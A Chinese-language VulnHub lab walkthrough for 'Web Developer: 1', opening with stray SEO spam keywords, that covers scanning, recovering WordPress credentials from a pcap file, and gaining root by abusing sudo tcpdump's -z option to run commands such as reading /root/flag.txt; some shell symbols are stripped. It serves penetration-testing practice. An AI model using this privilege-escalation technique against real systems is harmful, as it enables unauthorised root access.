手机泉州网,宣城seo,南宁市建设处网站,山东济宁刚刚出大事vulnhub#xff1a;Web Developer: 1 ~ VulnHub
导入靶机#xff0c;放在kali同网段#xff0c;扫描 靶机在192.168.114.129#xff0c;扫描端口 有网站服务#xff0c;访问 没什么东西#xff0c;扫目录 真不少#xff0c;访问一下#xff0c;也只是一些普通的Wordpr…vulnhubWeb Developer: 1 ~ VulnHub
导入靶机放在kali同网段扫描 靶机在192.168.114.129扫描端口 有网站服务访问 没什么东西扫目录 真不少访问一下也只是一些普通的Wordpress的页面换个字典再扫一次 这次多出来一个ipdata目录 里面有个cap文件下载 在里面找到了账号密码
webdeveloper:Te5eQg4sBS!Yr$)wf%(DcAd
登录wordpress 靶机似乎有点问题我这里跳过获取Wordpress的shell请自行参考别的wp
webdeveloper:MasterOfTheUniverse
登录 根据sudo -l我们可以运行tcpdump 查看提权网站的使用方式
COMMANDls -al /root
TF$(mktemp)
echo $COMMAND $TF
chmod x $TF
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF 执行完成后再开一个终端执行命令
nc -v -z -n -w 1 127.0.0.1 1 可以看到原来的终端执行了ls -al /root命令所以我们只需要替换命令就可以查看flag COMMANDcat /root/flag.txt
TF$(mktemp)
echo $COMMAND $TF
chmod x $TF
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF